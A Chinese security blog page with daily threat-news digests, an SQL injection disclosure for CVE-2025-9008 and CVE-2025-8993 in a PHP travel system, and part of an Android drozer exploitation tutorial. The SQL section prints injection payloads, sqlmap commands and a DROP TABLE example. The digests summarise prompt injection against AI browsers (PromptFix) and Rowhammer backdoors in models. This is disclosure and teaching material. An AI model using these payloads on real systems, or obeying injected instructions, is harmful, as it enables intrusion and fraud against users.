网络安全日报 2025年08月26日
1、APT36利用鱼叉式钓鱼攻击印度政府
https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/ 安全公司披露,巴基斯坦背景的APT组织Transparent Tribe(APT36)近期针对印度政府部门发动新一轮攻击。该组织通过鱼叉式钓鱼邮件投递伪装成PDF文件的恶意桌面快捷方式,分别针对Windows与印度自主研发的BOSS Linux系统。受害者一旦点击文件,将触发脚本下载恶意ELF二进制并连接至攻击者控制的C2服务器,以执行指令、窃取凭证和外泄数据。攻击链同时加载诱饵文档
2、恶意Go模块伪装SSH爆破工具进行窃密
https://socket.dev/blog/malicious-go-module-disguised-as-ssh-brute-forcer-exfiltrates-credentials 安全研究人员发现,一个名为“golang-random-ip-ssh-bruteforce”的恶意Go模块伪装成SSH爆破工具,却在成功登录后暗中将目标IP、用户名和密码发送至攻击者控制的Telegram机器人。该模块通过扫描随机IPv4地址寻找22端口开放的SSH服务,利用内置的弱口令字典尝试暴力破解,并关闭主机密钥验证以绕过身份校验。研究显示,该恶意包关联的GitHub账号“IllDieAnyw
3、虚假Mac修复程序诱骗用户安装Shamos信息窃取程序
https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/ 安全公司CrowdStrike发现,一款名为“Shamos”的新型信息窃取木马正在针对Mac用户展开攻击。该木马由网络犯罪组织COOKIE SPIDER开发,是AMOS(Atomic macOS Stealer)的变种,能窃取浏览器数据、Keychain凭证、Apple Notes及加密货币钱包信息。攻击者通过ClickFix攻击引诱受害者,利用恶意广告或伪造GitHub仓库发布“修复指南”,诱导用户在终端中执
4、Data I/O遭勒索攻击系统被迫下线
https://www.sec.gov/ix?doc=/Archives/edgar/data/351998/000165495425009925/daio_8k.htm 美国电子制造商Data I/O向SEC报告称,其内部IT系统于2025年8月16日遭遇勒索软件攻击,被迫关闭部分运营平台以防止扩散。该公司是全球领先的编程与安全配置设备供应商,客户涵盖汽车、物联网与工业控制行业。事件导致通信、收发货及制造生产等业务受到干扰,目前部分系统已恢复,但全面恢复时间尚未确定。公司已启动应急响应并聘请网络安全专家调查,计划按要求通报监管部门及相关人员。Data I/O警告称,恢复和顾问费用可能对财务
5、Rowhammer技术可向AI模型植入隐蔽后门
https://www.freebuf.com/articles/ai-security/445709.html 乔治梅森大学的研究团队开发出一种名为"OneFlip"的新型攻击技术,通过利用已知的Rowhammer物理内存攻击手段,仅需翻转易受攻击DRAM模块中的单个比特位,即可在全精度AI模型中植入后门。这项技术能在推理阶段通过改变模型权重来操控深度神经网络的输出结果。
6、新型攻击可绕过EDR检测窃取Windows系统凭证
https://www.freebuf.com/articles/system/445535.html 网络安全研究人员发现一种新型攻击技术,可绕过大多数终端检测与响应(EDR)系统的监控,静默窃取Windows系统中的敏感凭证信息。该技术使已获取Windows系统初始访问权限的攻击者能够收集凭证进行横向移动,而不会触发常见安全警报。
7、苹果iOS/iPadOS/macOS零日漏洞遭主动利用
https://www.anquanke.com/post/id/311464 美国网络安全与基础设施安全局(CISA)就影响苹果iOS、iPadOS和macOS操作系统的关键零日漏洞发布紧急警告,确认威胁分子正在积极利用该漏洞。该漏洞被追踪为CVE-2025-43300,已被列入CISA已知被利用漏洞(KEV)目录,标志着机构和个人用户需立即采取行动保护系统。
8、安卓银行木马Anatsa全球蔓延 精准锁定831款金融应用
https://www.anquanke.com/post/id/311442 安卓生态系统持续面临精密银行木马的顽固威胁。Zscaler ThreatLabz团队通过持续监控谷歌Play商店分发的恶意应用,揭示了Anatsa(又名TeaBot)恶意软件的最新演变趋势。研究人员指出:”Anatsa恶意软件最初于2020年出现,是一种能够窃取凭证、记录键盘输入并实施欺诈交易的安卓银行木马。”虽然早期活动主要针对欧美地区650余家金融机构,但最新行动已显著扩大范围。ThreatLabz发现”Anatsa最新变种已瞄准全球831家金融机构,新增德国、韩国等目标国以及加密货币平台”。
9、Docker Desktop存在未授权访问漏洞
https://www.secrss.com/articles/82302 近日,奇安信CERT监测到官方修复Docker Desktop 未授权访问漏洞(CVE-2025-9074),该漏洞源于 Docker Desktop 容器隔离机制不完善,本地运行的 Linux 容器可通过配置的 Docker 子网(默认 192.168.65.7:2375)访问 Docker Engine API。容器借此向 API 发送请求,执行控制其他容器、创建新容器、管理镜像等特权命令。在某些环境下(如 Docker Desktop for Windows 的 WSL 后端),攻击者可进一步挂载宿主机磁盘,完
10、新型Linux恶意软件利用文件名伪装实现隐蔽攻击
https://securityonline.info/a-new-linux-malware-hides-in-plain-sight-by-weaponizing-file-names/ Linux系统面临新型攻击,攻击者利用文件名和脚本处理漏洞植入恶意代码,通过内存加载后门程序实现隐蔽入侵,绕过传统防护措施,威胁服务器和IoT设备安全。
以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
在线旅游及旅行管理系统项目SQL注入
1.前言
之前在网上随便逛逛的时候,发现一个有各种各样的PHP项目的管理系统,随便点进一个查看,发现还把mysql版本都写出来了,而且还是PHP语言。
https://itsourcecode.com/free-projects/php-project/online-tours-and-travels-management-system-project-in-php-and-mysql/那这可能存在sql注入漏洞,所以代码审计了一下,并上报了CVE,现在编号下来了 CVE-2025-9008,CVE-2025-8993,于是公开发现过程。
2.漏洞详情
1.1 CVE-2025-9008
下载其源代码之后,对“在线旅游及差旅管理系统”进行安全审查期间,发现“/admin/sms_setting.php””文件中存在一个高危SQL注入漏洞。
$sql = "UPDATE sms_setting SET uname='".$_POST['uname']."',
password='".$_POST['password']."',
sender_id='".$_POST['sender_id']."'
WHERE id='1'";
这段sql代码一眼望过去就是,直接将用户通过 $_POST超全局数组提交的数据,未经任何过滤和转义,就拼接到了 SQL 查询字符串中,那这肯定就存在sql注入漏洞。
因为sql 注入的核心在于“混淆了代码和数据”,用户的输入本应被视为普通数据,但由于直接拼接,攻击者可以精心构造输入,让其成为 sql代码的一部分,从而篡改原SQL语句的意图。
比如说在密码 password 输入框中,攻击者输入了:' OR '1'='1
那么,最终拼接出来的 SQL 语句会变成:
UPDATE sms_setting SET
uname='hacker',
password='' OR '1'='1',
sender_id='fake_sender'
WHERE id='1'
这条语句的含义被彻底改变了。password字段的赋值不再是一个简单的字符串,而是变成了一个逻辑判断 '' OR '1'='1'。这个判断的结果是 永远为真。
更高级的攻击者甚至可以输入类似 '; DROP TABLE users; --的内容,从而执行任意sql命令,比如说删除数据库表,导出数据库数据之类的操作。
payload
---
Parameter: uname (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uname=111111111111' RLIKE (SELECT (CASE WHEN (2321=2321) THEN 111111111111 ELSE 0x28 END)) AND 'QhkJ'='QhkJ&password=111111111111111111&sender_id=1111111111111111111&update=
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: uname=111111111111' AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7178627171,(SELECT (ELT(9139=9139,1))),0x716a787171)) AND 'CAQx'='CAQx&password=111111111111111111&sender_id=1111111111111111111&update=
---
我们也可以使用一些工具来进行查看,比如说sqlmap。
sqlmap -u "http:/http://127.0.0.1/code/admin/sms_setting.php" --data="uname" --batch --dbs
通过 HTTP POST 请求 提交的、名为 uname的表单字段,选择了布尔盲注的攻击类型。
布尔盲注这是一种高级注入技术,用于当网站不会直接显示数据库错误信息,并且查询结果也不会直接返回到页面上的情况。攻击者通过向数据库发送一个“问题”,然后根据页面返回的细微差异,一般来说都是通过观察页面是否可以正常加载来判断。
而图中的payload
uname=111111111111' RLIKE (SELECT (CASE WHEN (2321=2321) THEN 111111111111 ELSE 0x28 END)) AND 'QhkJ'='QhkJ
111111111111:这是一个随机的无效用户名,目的是让原查询的uname匹配不到结果。
RLIKE: 这是MySQL的正则表达式匹配操作符,一般用它来触发一个条件判断。
(CASE WHEN (2321=2321) THEN ... ELSE ... END): 这是一个SQL的CASE条件语句。这里它判断一个永恒成立的条件 2321=2321
如果条件为 True,那么整个RLIKE语句会匹配用户名111111111111,页面可能会返回一个找不到用户名存在的状态。
如果条件为 False,比如说什么1=2之类的常见语句,那么CASE语句会返回一个错误的结果,导致RLIKE匹配失败,页面可能会返回一个完全空白的状态。
把2321=2321换成 (SELECT COUNT(*) FROM information_schema.schemata) > 5),观察页面的反应,盲猜出数据库名称出来。
所以明确了这里存在sql注入漏洞。
1.2 CVE-2025-8993
接着,在“/admin/expense_report.php”文件中又发现了一个严重的SQL注入漏洞。该漏洞源于对“from_date”参数的用户输入验证不足,使得攻击者能够注入恶意SQL查询。因此,攻击者可以未经授权访问数据库,修改或删除数据,并获取敏感信息。
这段代码的核心逻辑其实就是,首先检查用户是否点击了提交按钮if (isset($_POST['submit'])),然后就去获取用户表单中输入的起始日期$from_date和结束日期$to_date,连接数据库之后用一条 sql 语句,查询 expense表中所有在用户指定日期范围内创建的记录。
而且还用了PDO,PDO最重要的就是预处理语句,从根本上防御sql注入,但是又没使用好。
它将 sql 语句的结构 和 数据 分开发送给数据库服务器处理。
比如说先把一个带“占位符”的 sql 模板发送给数据库,数据库会解析并编译这个模板,确定它的结构。
$stmt = $pdo->prepare("SELECT * FROM users WHERE name = ? AND pwd = ?");
然后当执行阶段的时候,再把真实的数据,比如说什么用户输入的用户名和密码,发送给数据库,数据库只会把这些数据当正常数据值使用,不会把它当成 SQL 代码来解析。
这样就避免了,即使用户输入了恶意的数据比如说什么常见的 ' OR '1'='1,它也只会被当作一个普通的字符串字面值去进行匹配,而不会改变原sql语句的逻辑。从而彻底杜绝了 SQL 注入。
但是这条sql语句虽然也使用了PDO,但是它把用户要输入的from_date的值给它拼接到sql字符串了,代码和字符串直接拼接,完全绕过了PDO的安全保护,让PDO形同虚设。
$stmt = $conn->prepare("SELECT * FROM expense where created_date between '".$_POST['from_date']."' and '".$_POST['to_date']."' ");
$_POST['from_date'] 和 $_POST['to_date'] 没有任何过滤/转义,直接拼接到了 SQL 中。
攻击者只要在表单输入里构造恶意 payload,就能注入 sql。
虽然用了 PDO,但没有真正用到参数化查询。
$conn->prepare(...) 本身可以防止注入,但是这里不知道怎么回事,开发者依然把变量拼接到了 sql 里,相当于没起作用。
所以漏洞源于“from_date”参数的用户输入验证不足,导致攻击者能够注入恶意sql查询。
payload
---
Parameter: from_date (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: from_date=0111-11-11' AND GTID_SUBSET(CONCAT(0x71716a6271,(SELECT (ELT(8748=8748,1))),0x7162707071),8748)-- OwaD&to_date=0001-01-11&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: from_date=0111-11-11' AND (SELECT 5860 FROM (SELECT(SLEEP(5)))KNEf)-- vyOX&to_date=0001-01-11&submit=
---
用sqlmap进行检测
sqlmap -u "http:/http://127.0.0.1/code/admin/expense_report.php" --data="from_date" --batch --dbs
sqlmap 识别到 POST 参数 from_date 存在注入漏洞。
测试了多种方式,包括 基于报错注入 和 基于时间的盲注 ,都确认有效。
所谓的错误型注入,简单点说就是通过故意触发数据库错误,从而让数据库在报错信息中直接返回查询结果。
还有时间盲注 ,字面意思也就是通过让数据库执行延时函数,比如说什么 SLEEP(5),然后根据页面响应时间来判断注入的sql是否有效。
from_date=0111-11-11' AND (SELECT 5860 FROM (SELECT(SLEEP(5)))KNEf)-- vy0X&...
如果注入成功,数据库将会执行 SLEEP(5)命令,导致页面响应时间延迟5秒。sqlmap就会根据这个延迟就能判断出漏洞存在。
而且sqlmap 成功获取了数据库名:information_schema,这是系统库,每个cms都会有的。
tour1,这个才是该cms特有的数据库名称。
所以明确了POST参数的from_date存在注入漏洞。
3.建议修复
使用准备好的语句和参数绑定:准备好的语句可以防止 SQL 注入,因为它们将 SQL 代码与用户输入数据分离。使用准备好的语句时,用户输入的值将被视为纯数据,不会被解释为 SQL 代码。
输入验证和过滤:严格验证和过滤用户输入数据,确保其符合预期的格式。
最小化数据库用户权限:确保用于连接数据库的账户具有必要的最低权限。避免使用具有高级权限的账户,比如“root”或“admin”进行日常操作。
定期安全审计:定期进行代码和系统安全审计,及时发现并修复潜在的安全漏洞。
网络安全日报 2025年08月25日
1、恶意RAR文件名绕过检测投递Linux后门
https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/ 安全公司Trellix披露一起新型Linux攻击链,攻击者通过钓鱼邮件投递名为“yy.rar”的压缩包,内含恶意构造的文件名。该文件名嵌入Base64编码的Bash命令,可在shell解析时触发执行,从而绕过传统杀毒软件因其通常不扫描文件名的防护机制。攻击最终下载并运行Go语言编写的远控后门VShell,具备反弹Shell、文件操作、进程管理等功能。该手法利用Linux脚本中常见的命令注入隐患,实现全内存执行,增加检测难度。分析指出,这标志
2、黑客利用ADFS重定向窃取微软账号
https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/ Push Security研究人员发现,黑客正滥用微软Active Directory Federation Services(ADFS)实施新型钓鱼攻击,窃取Microsoft 365登录凭据。攻击链始于受害者点击伪造的Google赞助搜索结果,随后通过合法的outlook.office.com链接重定向至攻击者控制的域名,再跳转至钓鱼页面。由于初始重定向依赖微软可信基础设施,传统URL检测与多因素认证难以阻止。攻击者创建自有M
3、AI建站平台Lovable遭黑客滥用
https://www.proofpoint.com/us/blog/threat-insight/cybercriminals-abuse-ai-website-creation-app-phishing 安全公司Proofpoint报告称,AI建站与托管平台Lovable正被大规模滥用于网络犯罪,黑客借助其便捷功能生成钓鱼页面、恶意下载站及仿冒知名品牌的欺诈网站。自今年2月以来,研究人员已监测到数万条Lovable相关恶意URL。典型案例包括利用钓鱼即服务平台Tycoon开展的攻击,攻击邮件引导用户访问Lovable托管页面,先通过验证码过滤,再跳转至伪造的微软或Okta登录界面窃取凭据
4、国际刑警非洲行动抓捕1209名网络罪犯
https://www.interpol.int/en/News-and-Events/News/2025/African-authorities-dismantle-massive-cybercrime-and-fraud-networks-recover-millions 国际刑警组织(INTERPOL)宣布,在“塞伦盖蒂行动”第二阶段中,非洲18国警方联合逮捕1209名网络犯罪分子,涉及8.8万名受害者,挽回资金9740万美元,并拆除1.14万处恶意基础设施。行动重点包括:安哥拉查封25处非法加密货币挖矿中心,60名嫌疑人涉案,价值3700万美元的设备被没收用于民生供电;赞比亚捣毁大规
5、DaVita遭勒索攻击近270万患者信息泄露
https://www.bleepingcomputer.com/news/security/davita-ransomware-attack-exposed-data-of-nearly-27-million-people/ 美国知名肾脏透析公司DaVita确认,其网络在今年3月至4月间遭勒索软件攻击,约268万名患者的个人及健康数据被窃取。泄露信息包括姓名、住址、社保号、健康保险资料及透析实验室结果,部分受害者还涉及税号及支票影像。事件最初导致系统加密并干扰运营,随后发现黑客已窃取约1.5TB数据。尽管公司未公开指认攻击方,但勒索组织Interlock已声称负责,并在暗网泄露部分文件。D
6、黑客利用ClickFix投递CORNFLAKE.V3后门
https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor 谷歌旗下Mandiant披露,威胁组织UNC5518正通过“ClickFix”社工手法和伪造CAPTCHA页面投递多功能后门CORNFLAKE.V3。攻击链通常从搜索引擎投毒或恶意广告引导用户进入假验证页面开始,诱骗其在Windows运行框中执行恶意PowerShell脚本。该后门支持通过HTTP加载多种载荷,包括DLL、脚本和远控工具,并通过Cloudflare隧道隐藏通信。CORNFLAKE.V3较前代版本增加了
7、Commvault曝多漏洞可致远程代码执行
https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/ Commvault近日修复了四个严重漏洞(CVE-2025-57788至57791),影响11.36.60之前版本,可能被攻击者组合利用实现远程代码执行。这些漏洞涵盖未认证API调用、默认凭证滥用、路径遍历及命令行参数注入等问题。其中CVE-2025-57790被评为高危(CVSS 8.7)。研究人员指出,攻击者可构造两条“预认证”攻击链完成利用,若管
8、恶意软件伪装杀毒软件攻击俄罗斯用户
https://news.drweb.com/show/?i=15047&lng=en& 安全公司Doctor Web披露,一款伪装成“GuardCB”杀毒软件的恶意程序正在针对俄罗斯用户传播。该木马名为Android.Backdoor.916.origin,自2025年1月起活跃,具备窃取消息、录音录像、截取输入、实时屏幕和摄像头直播等强大间谍功能。研究人员指出,其主要目标并非普通安卓用户,而是俄罗斯商界代表。攻击者通过即时通讯消息分发应用,利用与央行或执法部门相关的假图标和扫描结果博取信任。安装后,程序会请求大量敏感权限,并通过多家主机服务保持命令控制。分析显示,该恶意软件可监控Gmai
9、澳洲iiNet泄露28万客户信息
https://wcsecure.weblink.com.au/pdf/TPG/02980096.pdf 澳大利亚电信巨头TPG Telecom确认,其子公司iiNet遭遇网络攻击,导致约28万名客户邮箱地址外泄,同时还包括2万条固定电话号、1万余条用户地址与电话信息,以及约1700个调制解调器设置密码。事件起因于一名员工凭证被盗,黑客借此进入iiNet的订单与追踪系统。TPG称攻击已于8月16日被遏制,未波及其他品牌和系统。公司已向澳交所报告并承诺逐一通知受影响客户,提供应对指导和支持,同时向未受影响的用户确认安全情况。
10、Windows 11更新引发 SSD 故障:微软调查关键存储缺陷
微软确认部分Win11用户安装KB5063878更新后遭遇SSD/HDD存储故障,持续写入大文件可能导致设备失效。微软与Phison正联合调查但尚未复现问题,呼吁用户提交日志协助分析。故障涉及Phison控制器硬盘,修复方案待定。
以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年08月22日
1、FBI警告俄黑客滥用思科旧漏洞
https://blog.talosintelligence.com/static-tundra/ 美国联邦调查局(FBI)警告,与俄罗斯联邦安全局(FSB)相关的黑客组织“Static Tundra”正利用思科IOS/IOS XE中长达七年的高危漏洞CVE-2018-0171开展网络间谍活动。该漏洞存在于Smart Install功能中,攻击者可远程执行代码并维持长期持久化访问。Cisco Talos披露,受害目标涉及北美、亚洲、非洲及欧洲的电信、高校和制造业组织,重点针对乌克兰及其盟国。攻击方式包括窃取配置文件、植入“SYNful Knock”恶意固件、修改设备配置以隐藏痕迹,并通过GR
2、GodRAT木马瞄准金融交易机构
https://securelist.com/godrat/117119/ 卡巴斯基披露,一种名为“GodRAT”的新型远控木马近期针对交易和券商等金融机构发动攻击。攻击者通过Skype传播伪装成金融文档的恶意屏保文件(.SCR),利用隐写术在图片中隐藏shellcode下载木马。GodRAT基于早期的Gh0st RAT代码,采用插件化设计,可窃取系统与安全软件信息,并扩展功能执行文件操作、窃取浏览器密码或投递AsyncRAT等二次载荷。其传播方式与2023年出现的“AwesomePuppet”木马相似。研究人员指出,攻击已波及阿联酋、黎巴嫩、马来西亚和约旦等地,提醒金融机构提高警惕,防范恶
3、黑客滥用ActiveMQ漏洞投放DripDropper
https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/ 安全公司Red Canary报告称,未知威胁行为者正利用Apache ActiveMQ中的高危漏洞CVE-2023-46604在云端Linux系统上部署新型恶意程序“DripDropper”。该漏洞自2023年10月被修复后仍遭广泛利用,曾被用于传播勒索软件、Rootkit和僵尸网络。攻击者在入侵后会修改sshd配置获取root权限,并投递DripDropper下载器,该程序通过Dropbox进行通信,具备抵抗分析的能力,并能投递额外文件实现进程
4、专家揭示PromptFix漏洞威胁AI浏览器安全
https://guard.io/labs/scamlexity-we-put-agentic-ai-browsers-to-the-test-they-clicked-they-paid-they-failed Guardio Labs研究人员发现,新型提示注入手法“PromptFix”可欺骗生成式AI浏览器(如Comet),在网页中通过伪造CAPTCHA隐藏恶意指令,从而诱使AI执行未授权操作。该攻击无需强行干扰模型,而是利用其“快速帮助用户”的设计目标,令AI自动在钓鱼或仿冒商城中下单、填写地址及信用卡信息,甚至在虚假银行邮件中完成登录,用户全程不知情。研究者将此现象称为“Scamle
5、DOM点击劫持漏洞威胁密码管理器
https://defcon.org 在DEF CON 33大会上,安全研究员Marek Tóth披露,流行的浏览器密码管理器插件存在基于DOM的点击劫持漏洞,攻击者可借此窃取用户登录凭证、信用卡信息及双因素认证码(2FA)。攻击方式通过恶意脚本操纵扩展注入的UI元素(如自动填充提示),并将其隐藏在网页弹窗下方,诱导用户点击触发凭证自动填充,从而泄露敏感数据。测试显示,1Password、iCloud Passwords、Bitwarden、LastPass等11款主流插件均受影响,其中多数在子域名场景下也会泄露数据。当前已有部分厂商着手修复,但仍有漏洞未补。专家建议用户在修复前禁用自动填充
6、苹果紧急修复iOS/iPadOS/macOS中被利用的零日漏洞
https://thehackernews.com/2025/08/apple-patches-cve-2025-43300-zero-day.html 苹果修复iOS/iPadOS/macOS高危零日漏洞CVE-2025-43300,该漏洞通过恶意图像可导致内存损坏,已被用于针对性攻击。受影响设备需升级至最新版本,今年苹果已修复7个零日漏洞。
7、联想GPT-4客服系统因XSS漏洞遭攻击
https://www.csoonline.com/article/4043005/lenovo-chatbot-breach-highlights-ai-security-blind-spots-in-customer-facing-systems.html 联想GPT-4客服系统因XSS漏洞遭攻击,恶意提示词可窃取会话cookie,暴露AI系统输入过滤缺陷。专家建议将AI纳入安全管道,防范提示词注入,平衡创新与安全。联想已修复漏洞。
8、麒麟勒索软件团伙宣称窃取日产汽车4TB设计数据
https://www.freebuf.com/articles/database/445339.html 麒麟(Qilin)勒索软件团伙宣称入侵了日产汽车旗下设计子公司Creative Box Inc.(CBI),窃取超过4TB数据,并公开了汽车设计文件、财务数据、3D模型和VR设计图像作为证据。该组织在其暗网泄露网站上表示,从日产CBI复制了405,882个文件,包含与日产汽车项目相关的3D设计数据、报告、照片、视频及各类内部文档。
9、新型MITM6+NTLM中继攻击可提权控制域环境
https://www.freebuf.com/articles/445273.html 一种结合MITM6(中间人攻击)与NTLM(NT LAN管理器)中继技术的复杂攻击链,可实现Active Directory(活动目录)域的完全控制。该攻击利用Windows默认的IPv6自动配置行为,使攻击者能在数分钟内从普通网络访问权限提升至域管理员权限。
10、微软限制中国企业获取网络安全漏洞预警通知
https://www.freebuf.com/news/445224.html 2025 年 8 月 21 日,微软在调查了一起数据泄露事件是否导致一系列利用其 SharePoint 软件漏洞的黑客攻击后,现已限制中国企业获取其技术中网络安全漏洞预警通知的权限。
以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年08月21日
1、ERMAC木马源码泄露暴露基础设施
https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak 研究人员发现,安卓银行木马ERMAC 3.0的完整源码近日泄露,暴露了其恶意软件即服务(MaaS)平台的内部机制与基础设施。源码包含后端、前端面板、数据窃取服务器、木马生成器和混淆器,显示其攻击范围扩展至700余款银行、购物及加密货币应用。ERMAC由“BlackRock”黑客组织运营,最早于2021年被发现,后续版本以高价出租给网络犯罪分子。此次泄露还揭示了操作方存在严重安全失误,如硬编码凭据、默认管理员账号及无注册保护的控制面板,导致其C2服务器与管理后台暴露。专家
2、超过800台N-able服务器未修补高危漏洞
https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-1/ 研究显示,超过800台N-able N-central服务器仍未修补两个被积极利用的高危漏洞(CVE-2025-8875与CVE-2025-8876)。N-central是广泛应用于托管服务供应商和IT部门的网络与设备集中管理平台。漏洞允许攻击者通过输入注入与不安全反序列化方式执行命令,威胁严重。N-able已在2025.3.1版本中发布补丁,并确认部分本地环境已遭利用,尽管其托管云环境暂未受影响。美国CISA已将漏洞加入已知被利用漏洞目
3、美制药公司Inotiv遭勒索攻击业务受扰
https://www.sec.gov/Archives/edgar/data/720154/000162828025040658/notv-20250808.htm 美国制药企业Inotiv确认,其部分系统与数据于8月8日遭勒索软件加密,导致业务运营受到干扰。公司已向美国证券交易委员会提交报告,并在外部安全专家协助下展开调查,同时通报执法机构。勒索组织Qilin声称窃取了约16.2万份文件,总计176GB,并在泄露网站公开部分样本。Inotiv总部位于印第安纳州,主营药物研发与安全评估,雇员约2000人,年营收超5亿美元。此次事件导致数据库和内部应用等核心系统中断,部分业务被迫转移至离线环
4、Capsule Kubernetes多租户框架存在严重漏洞
https://securityonline.info/cve-2025-55205-critical-flaw-in-capsule-kubernetes-exposes-clusters-to-cross-tenant-attacks/ Capsule Kubernetes多租户框架曝高危漏洞(CVE-2025-55205,CVSS 9.1),允许租户通过标签注入攻击绕过隔离机制,访问系统命名空间和其他租户资源,导致特权提升和数据泄露。影响v0.10.3及更早版本,建议立即更新。
5、黑客组织ShinyHunters涉嫌公开SAP零日漏洞利用代码
https://cybersecuritynews.com/exploit-for-sap-0-day-vulnerability/ ShinyHunters公开SAP关键漏洞利用代码,可致系统完全接管和远程代码执行,CVSS评分10.0。企业须立即应用补丁3594142和3604119,并监控相关组件请求,限制互联网访问权限。
6、朝鲜APT组织利用GitHub攻击各国使馆
https://securityonline.info/spies-in-plain-sight-how-north-korean-hackers-used-github-to-attack-embassies/ 朝鲜黑客组织利用GitHub等合法平台发起钓鱼攻击,针对全球外交机构窃取敏感数据。攻击者发送伪装成外交信件的恶意邮件,部署XenoRAT木马窃取信息。行动高度情境化,使用多语言诱饵,技术特征指向朝鲜APT43组织。
7、谷歌Chrome紧急修复V8引擎高危漏洞
https://securityonline.info/google-chrome-issues-high-severity-fix-for-v8-engine-vulnerability-cve-2025-9132/ 谷歌紧急修复Chrome高危漏洞CVE-2025-9132,涉及V8引擎越界写入风险,可能被利用执行恶意代码。所有用户应立即更新至139.0.7258.138/.139版本,基于Chromium的浏览器也需警惕。
8、Windows高权限零日漏洞在暗网被开价12.5万美元售卖
https://www.freebuf.com/articles/vuls/445122.html 一名自称 adrmc21 的威胁行为者在暗网论坛上公开出售一个针对 Windows 系统的零日远程代码执行(RCE)漏洞。该漏洞声称可在最新的 Windows 10、Windows 11 及 Windows Server 2022 系统上实现内核级或高权限执行,攻击成功率超过95%,并可绕过防病毒(AV)和端点检测与响应(EDR)解决方案。出售价格为 125,000 美元。
9、安装超10万的"合法"Chrome VPN扩展暗中截屏窃取敏感数据
https://www.freebuf.com/articles/database/445104.html 一款安装量超过10万次且获得谷歌认证徽章的Chrome VPN扩展程序,近日被发现实为高级间谍软件,会在未经用户同意的情况下持续截取屏幕截图并窃取敏感数据。
10、USB威胁卷土重来:新型多阶段挖矿攻击通过感染设备传播
https://www.freebuf.com/articles/endpoint/444995.html CyberProof公司的MDR(托管检测与响应)分析师发现了一种通过受感染USB设备传播的多阶段加密货币挖矿攻击,这再次证明了可移动介质在企业环境中构成的持续威胁。
以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
Android四大组件安全漏洞实战
Android 四大组件Activity、Service、Broadcast Receiver和Content Provider是应用程序的核心组成部分,但如果实现不当,会引入严重的安全漏洞。本文将详细分析各组件常见的安全漏洞,通过漏洞代码逻辑基于 drozer 的利用方式,能够更清楚的了解具体漏洞的原理以及利用方法。
具体droze的下载和安装不详细介绍,可以自行百度,安装完成后先在android端运行drozer agent,点击开启。
在电脑端通过adb实现端口转发,并成功启动drozer
adb forward tcp:31415 tcp:31415
drozer console connect
通过app.package.list的filter参数过滤alan关键词的包名称
run app.package.list --filter alan
查询该app的包信息
run app.package.info -a com.asec.alan
利用app.package.attacksurface可以查询该APP的攻击面,即漏洞的点和数量。
run app.package.attacksurface com.asec.alan
完成上述的操作后,即可对相关的漏洞进行检测分析了,接下来针对具体的组件和漏洞进行测试操作。
一、Activity
Activity 作为 Android 的界面组件,负责与用户交互,其安全问题直接影响用户数据安全。
1、未授权访问漏洞
需要登录权限的 Activity 未做严格校验,导致恶意应用可直接通过 Intent 启动。
通过以下drozer命令可以查看当前app的所有activity,并确认无权限限制
run app.activity.info -a com.asec.alan
对于这些activity的执行逻辑属于
LoginActivity登录->MainActivity->InfoQueryActivity
LoginActivity登录->MainActivity->FileQueryActivity
1)漏洞代码
以下为具体的代码,以LoginActivity登录->MainActivity->InfoQueryActivity场景为例,可以看到首先LoginActivity以硬编码的形式进行用户密码的判断,并使用SharePreference进行了登录态的存储
当用户密码登录成功后即可跳转MainActivity,MainActivity对登录态简单做了校验,确认其中的is_logged_in的值存在即可加载。
通过MainActivity跳转到InfoQueryActivity直接进行点击事件的监听跳转
该acitivity直接加载,未进行登录态的校验
通过上述APP代码的分析,可以判断出MainActivity的加载做了简单的登录态校验,但是如果已经登录过,且登录态写入到user_prefs.xml中后,只要不进行删除即可直接通过命令加载成功实现绕过;InfoQueryActivity的加载并未做任何校验,可以尝试直接进行加载。
2)漏洞利用
MainActivity加载:
基于上述代码逻辑的分析,接下来通过drozer命令进行利用测试,如果已经登录过APP,则在该程序目录会生成user_prefs.xml文件,里面会写入"is_logged_in"的值为true
MainActivity的加载可直接通过drozer命令加载
run app.activity.start --component com.asec.alan com.asec.alan.MainActivity
执行后成功记载MainActivity
删除user_prefs.xml文件,再利用drozer命令尝试加载MainActivity则失败
InfoQueryActivity加载:
InfoQueryActivity则通过app.activity.start命令直接加载即可。
run app.activity.start --component com.asec.alan com.asec.alan.InfoQueryActivity
3)修复建议
二、Service
Service 用于后台处理任务,若存在漏洞可能导致敏感操作被恶意调用。
新建一个用于漏洞测试的service,并写入一些漏洞的逻辑
service组件运行导出
